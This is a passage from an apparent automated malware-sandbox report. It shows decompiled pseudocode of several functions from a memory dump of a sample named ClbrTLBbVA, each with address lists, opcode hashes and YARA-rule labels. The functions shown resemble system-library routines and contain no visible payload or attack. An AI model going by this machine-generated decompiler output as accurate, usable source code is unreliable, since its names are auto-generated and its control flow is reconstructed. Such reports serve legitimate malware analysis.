													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x179b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x17984c0;
																			if(_t82 >=  *0x17984c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E01779063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E016A922A(_t99);
										_t64 = E016C7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E01778B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x17986c0; // 0x12407b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x17986b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x17986bc;
													_t87 = 0x17986b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E016A9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x17986c4;
												_t87 = 0x17986c0;
												L27:
												E016D9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E016FD130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x1795388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x179538c = _t51;
						goto L6;
					}
				}
			}




















                                        0x016a9082
                                        0x016a9083
                                        0x016a9084
                                        0x016a9085
                                        0x016a9087
                                        0x016a9096
                                        0x016a9098
                                        0x016a9098
                                        0x016a909e
                                        0x016a90a8
                                        0x016a90e7
                                        0x016a90e7
                                        0x016a90aa
                                        0x016a90b0
                                        0x016a90b7
                                        0x016a90bd
                                        0x016a90dd
                                        0x016a90e6
                                        0x016a90bf
                                        0x016a90bf
                                        0x016a90c7
                                        0x016a90cf
                                        0x016a90f1
                                        0x016a90f2
                                        0x016a90f4
                                        0x016a90f5
                                        0x016a90f6
                                        0x016a90f7
                                        0x016a90f8
                                        0x016a90f9
                                        0x016a90fa
                                        0x016a90fb
                                        0x016a90fc
                                        0x016a90fd
                                        0x016a90fe
                                        0x016a90ff
                                        0x016a9100
                                        0x016a9102
                                        0x016a9107
                                        0x016a910c
                                        0x016a9110
                                        0x016a9113
                                        0x016a9115
                                        0x016a9136
                                        0x016a913f
                                        0x016a9143
                                        0x017037e4
                                        0x017037e4
                                        0x016a9117
                                        0x016a9117
                                        0x016a911d
                                        0x00000000
                                        0x016a911f
                                        0x016a911f
                                        0x016a9125
                                        0x00000000
                                        0x016a9127
                                        0x016a912d
                                        0x016a9130
                                        0x016a9134
                                        0x016a9158
                                        0x016a915d
                                        0x016a9161
                                        0x016a9168
                                        0x01703715
                                        0x016a916e
                                        0x016a916e
                                        0x016a9175
                                        0x016a9177
                                        0x016a917e
                                        0x016a917f
                                        0x016a9182
                                        0x016a9182
                                        0x016a9187
                                        0x016a9187
                                        0x016a918a
                                        0x016a918d
                                        0x016a918f
                                        0x016a9192
                                        0x016a9195
                                        0x016a9198
                                        0x016a9198
                                        0x016a9198
                                        0x016a919a
                                        0x00000000
                                        0x00000000
                                        0x0170371f
                                        0x01703721
                                        0x01703727
                                        0x0170372f
                                        0x01703733
                                        0x01703735
                                        0x01703738
                                        0x0170373b
                                        0x0170373d
                                        0x01703740
                                        0x00000000
                                        0x01703746
                                        0x01703746
                                        0x01703749
                                        0x00000000
                                        0x0170374f
                                        0x0170374f
                                        0x01703751
                                        0x01703757
                                        0x01703759
                                        0x0170375c
                                        0x0170375c
                                        0x0170375e
                                        0x0170375e
                                        0x01703761
                                        0x01703764
                                        0x00000000
                                        0x00000000
                                        0x01703766
                                        0x01703768
                                        0x017037a3
                                        0x017037a3
                                        0x017037a5
                                        0x017037a7
                                        0x017037ad
                                        0x017037b0
                                        0x017037b2
                                        0x017037bc
                                        0x017037c2
                                        0x017037c2
                                        0x017037b2
                                        0x016a9187
                                        0x016a9187
                                        0x016a918a
                                        0x016a918d
                                        0x016a918f
                                        0x016a9192
                                        0x016a9195
                                        0x00000000
                                        0x016a9195
                                        0x00000000
                                        0x0170376a
                                        0x0170376a
                                        0x0170376a
                                        0x0170376c
                                        0x0170376c
                                        0x0170376f
                                        0x01703775
                                        0x00000000
                                        0x00000000
                                        0x01703777
                                        0x01703779
                                        0x01703782
                                        0x01703787
                                        0x01703789
                                        0x01703790
                                        0x01703790
                                        0x0170378b
                                        0x0170378b
                                        0x0170378b
                                        0x01703792
                                        0x01703795
                                        0x00000000
                                        0x01703795
                                        0x00000000
                                        0x01703779
                                        0x01703798
                                        0x00000000
                                        0x01703798
                                        0x00000000
                                        0x01703768
                                        0x0170379b
                                        0x0170379b
                                        0x01703751
                                        0x01703749
                                        0x00000000
                                        0x01703740
                                        0x016a91a0
                                        0x016a91a3
                                        0x016a91a9
                                        0x016a91b0
                                        0x00000000
                                        0x016a91b0
                                        0x016a9187
                                        0x016a91b4
                                        0x016a91b4
                                        0x016a91bb
                                        0x016a91c0
                                        0x016a91c5
                                        0x016a91c7
                                        0x017037da
                                        0x016a91cd
                                        0x016a91cd
                                        0x016a91cd
                                        0x016a91d2
                                        0x016a91d5
                                        0x016a9239
                                        0x016a9239
                                        0x016a91d7
                                        0x016a91db
                                        0x016a91e1
                                        0x016a91e7
                                        0x016a91fd
                                        0x016a9203
                                        0x016a921e
                                        0x016a9223
                                        0x00000000
                                        0x016a9205
                                        0x016a9205
                                        0x016a9208
                                        0x016a920c
                                        0x016a9214
                                        0x016a9214
                                        0x016a920c
                                        0x016a91e9
                                        0x016a91e9
                                        0x016a91ee
                                        0x016a91f3
                                        0x016a91f3
                                        0x016a91f3
                                        0x016a91e7
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x016a9134
                                        0x016a9125
                                        0x016a911d
                                        0x016a914e
                                        0x016a90d1
                                        0x016a90d1
                                        0x016a90d3
                                        0x016a90d6
                                        0x016a90d8
                                        0x00000000
                                        0x016a90d8
                                        0x016a90cf

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4c972329a266b8c540fb921555a6a1da38b4a10e46cdb290d4a077880a72781a
                                        • Instruction ID: e33eb04ed254ff37411ffbf5a046261fd0ede08a00fc97a0542dd829cb596132
                                        • Opcode Fuzzy Hash: 4c972329a266b8c540fb921555a6a1da38b4a10e46cdb290d4a077880a72781a
                                        • Instruction Fuzzy Hash: 3A01F4725012148FC3268F18DC40B11BBE9EB42368F31806FE6018B792C374DC41CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01774015 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 86%
                                        			E01774015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E016C2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E016C2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x17986ac);
					E016AF900(0x17986d4, _t28);
					E016BFFB0(0x17986ac, _t28, 0x17986ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E016BFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                        0x0177401a
                                        0x0177401e
                                        0x01774023
                                        0x01774028
                                        0x01774029
                                        0x0177402b
                                        0x0177402f
                                        0x01774043
                                        0x01774046
                                        0x01774051
                                        0x01774057
                                        0x0177405f
                                        0x01774062
                                        0x01774067
                                        0x0177406f
                                        0x0177407c
                                        0x0177407c
                                        0x0177408c
                                        0x0177408c
                                        0x01774097

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c7a38f8d550c2cf3a751e8430fcae4c60bccca52126f792006ca70beb2090ebf
                                        • Instruction ID: 3e7d7ef5883976586aa7a6bfe51b9007c59d3fd29735335b09f74f1bccf69845
                                        • Opcode Fuzzy Hash: c7a38f8d550c2cf3a751e8430fcae4c60bccca52126f792006ca70beb2090ebf
                                        • Instruction Fuzzy Hash: F2018F7220194A7FD711AB6DCD84E67F7ADFB55A60B00026DF50887A22CB24EC51CAE8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017614FB Relevance: .0, Instructions: 48COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 61%
                                        			E017614FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x179d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E016EFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E016C7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E016EB640(E016E9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                        0x017614fb
                                        0x017614fb
                                        0x0176150a
                                        0x01761514
                                        0x01761519
                                        0x0176151b
                                        0x01761526
                                        0x0176152c
                                        0x01761534
                                        0x01761537
                                        0x0176153a
                                        0x01761545
                                        0x01761557
                                        0x01761547
                                        0x01761550
                                        0x01761550
                                        0x01761562
                                        0x01761563
                                        0x01761565
                                        0x0176156a
                                        0x0176157f

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 291e64bc143391cded64e2c3547cbbb0e4d57a3baffc9d2f6c243211549b151e
                                        • Instruction ID: b34d3347127c588133b5e22e9ef35b7a065a3eab1a570a46ed63ebba9248aaa6
                                        • Opcode Fuzzy Hash: 291e64bc143391cded64e2c3547cbbb0e4d57a3baffc9d2f6c243211549b151e
                                        • Instruction Fuzzy Hash: 08019271A01259EFCB10DFACD845EAEBBB8EF44710F40405AFD05EB280D670DA01CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0176138A Relevance: .0, Instructions: 48COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 61%
                                        			E0176138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x179d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E016EFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E016C7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E016EB640(E016E9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                        0x0176138a
                                        0x0176138a
                                        0x01761399
                                        0x017613a3
                                        0x017613a8
                                        0x017613aa
                                        0x017613b5
                                        0x017613bb
                                        0x017613c3
                                        0x017613c6
                                        0x017613c9
                                        0x017613d4
                                        0x017613e6
                                        0x017613d6
                                        0x017613df
                                        0x017613df
                                        0x017613f1
                                        0x017613f2
                                        0x017613f4
                                        0x017613f9
                                        0x0176140e

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93a3e170bf047d33580c01d52e96d262095ad334ec31269f70cf18b516a3752d
                                        • Instruction ID: a21304770e65ce175b5e5272acba89711e2c1b5bf355aee0759c04659cec6717
                                        • Opcode Fuzzy Hash: 93a3e170bf047d33580c01d52e96d262095ad334ec31269f70cf18b516a3752d
                                        • Instruction Fuzzy Hash: 89019271A01219AFCB10DFA9D845EAEBBB8EF44710F40405ABD01EB280D6709A01CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01771074 Relevance: .0, Instructions: 46COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E01771074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0177165E(__ebx, 0x1798ae4, (__edx -  *0x1798b04 >> 0x14) + (__edx -  *0x1798b04 >> 0x14), __edi, __ecx, (__edx -  *0x1798b04 >> 0x14) + (__edx -  *0x1798b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0176AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E016C7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0175FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                        0x01771074
                                        0x01771080
                                        0x01771082
                                        0x0177108a
                                        0x0177108f
                                        0x01771093
                                        0x017710ab
                                        0x017710ab
                                        0x017710c3
                                        0x017710cf
                                        0x017710e1
                                        0x017710d1
                                        0x017710da
                                        0x017710da
                                        0x017710e9
                                        0x017710f5
                                        0x017710f5
                                        0x017710fe

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6fbb39f4d80daf6eb07477d5a5b934d3e60c287c68a7eddb780dd3c3ef2e1b8d
                                        • Instruction ID: 176ddccdff3b07b1fd33f6185fcb6ed674ab921449782c5b5d57bf77f6e4dc53
                                        • Opcode Fuzzy Hash: 6fbb39f4d80daf6eb07477d5a5b934d3e60c287c68a7eddb780dd3c3ef2e1b8d
                                        • Instruction Fuzzy Hash: BB0147726047469FCB11EF28C844B1AFBE9FB84310F04C629F98693294EE30E945CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016BB02A Relevance: .0, Instructions: 46COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E016BB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E016C7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E01727016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                        0x016bb037
                                        0x016bb039
                                        0x016bb03b
                                        0x016bb040
                                        0x0170a60e
                                        0x00000000
                                        0x00000000
                                        0x0170a61d
                                        0x016bb04b
                                        0x016bb04e
                                        0x0170a627
                                        0x0170a634
                                        0x00000000
                                        0x00000000
                                        0x0170a641
                                        0x0170a653
                                        0x0170a643
                                        0x0170a64c
                                        0x0170a64c
                                        0x0170a65b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0170a66c
                                        0x016bb057
                                        0x016bb057
                                        0x016bb057
                                        0x016bb046
                                        0x016bb046
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                        • Instruction ID: 6217bdf23a2cdd1d973a0517897338219c04c4b51014fdcef86c2b2433f90c86
                                        • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                        • Instruction Fuzzy Hash: 2B017172200A80DFE727875CCD88FB6BBE8EB95750F0900A1EA15CB691D728DC81C725
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0175FE3F Relevance: .0, Instructions: 46COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 59%
                                        			E0175FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x179d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E016EFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E016C7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E016EB640(E016E9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                        0x0175fe3f
                                        0x0175fe3f
                                        0x0175fe4e
                                        0x0175fe58
                                        0x0175fe5d
                                        0x0175fe5f
                                        0x0175fe6a
                                        0x0175fe72
                                        0x0175fe75
                                        0x0175fe78
                                        0x0175fe83
                                        0x0175fe95
                                        0x0175fe85
                                        0x0175fe8e
                                        0x0175fe8e
                                        0x0175fea0
                                        0x0175fea1
                                        0x0175fea3
                                        0x0175fea8
                                        0x0175febd

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ed6ed7bf4c8827e3cf3217cb615de244a993dd571efeec3f3652ade9c4a48652
                                        • Instruction ID: 3f01dcf30ec286f4c90fd5e840f037ea90819322caef0746fca33ec45348f14d
                                        • Opcode Fuzzy Hash: ed6ed7bf4c8827e3cf3217cb615de244a993dd571efeec3f3652ade9c4a48652
                                        • Instruction Fuzzy Hash: E5018871A01219ABDB14DFA9D845FAEB7B9EF44710F00416AFD009B281D9709901C794
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0175FEC0 Relevance: .0, Instructions: 46COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 59%
                                        			E0175FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x179d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E016EFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E016C7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E016EB640(E016E9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                        0x0175fec0
                                        0x0175fec0
                                        0x0175fecf
                                        0x0175fed9
                                        0x0175fede
                                        0x0175fee0
                                        0x0175feeb
                                        0x0175fef3
                                        0x0175fef6
                                        0x0175fef9
                                        0x0175ff04
                                        0x0175ff16
                                        0x0175ff06
                                        0x0175ff0f
                                        0x0175ff0f
                                        0x0175ff21
                                        0x0175ff22
                                        0x0175ff24
                                        0x0175ff29
                                        0x0175ff3e

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8038f5ea136f6ad98cd42ed8c1f941163d1cb3436266d7aca6f0525797f90075
                                        • Instruction ID: c77b8d9c8cbf078b941d4a714e77b125d0841ce5037dbe4108f67a241a121120
                                        • Opcode Fuzzy Hash: 8038f5ea136f6ad98cd42ed8c1f941163d1cb3436266d7aca6f0525797f90075
                                        • Instruction Fuzzy Hash: 2E018471A01619ABDB14DBA9D845FAEBBB8EF44710F40416AFD01AB280DA709A01CBD8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01778A62 Relevance: .0, Instructions: 44COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 54%
                                        			E01778A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x179d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E016C7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E016EB640(E016E9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                        0x01778a62
                                        0x01778a71
                                        0x01778a79
                                        0x01778a82
                                        0x01778a85
                                        0x01778a89
                                        0x01778a8c
                                        0x01778a8f
                                        0x01778a92
                                        0x01778a95
                                        0x01778a9f
                                        0x01778ab1
                                        0x01778aa1
                                        0x01778aaa
                                        0x01778aaa
                                        0x01778abc
                                        0x01778abd
                                        0x01778abf
                                        0x01778ac4
                                        0x01778ada

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e2347dd89fea0187a5c6426fbf37b0d572cec2ead970c3072178d0049b2916aa
                                        • Instruction ID: 235937914533ea9d501943c4b8c130eaef1835736c71f83ed14d0209d33b2dfe
                                        • Opcode Fuzzy Hash: e2347dd89fea0187a5c6426fbf37b0d572cec2ead970c3072178d0049b2916aa
                                        • Instruction Fuzzy Hash: 49012CB1A0121DAFCB00DFA9D9459AEBBF8FF59710F10405AF905E7341D634AA01CBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01778ED6 Relevance: .0, Instructions: 44COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 54%
                                        			E01778ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x179d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E016C7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
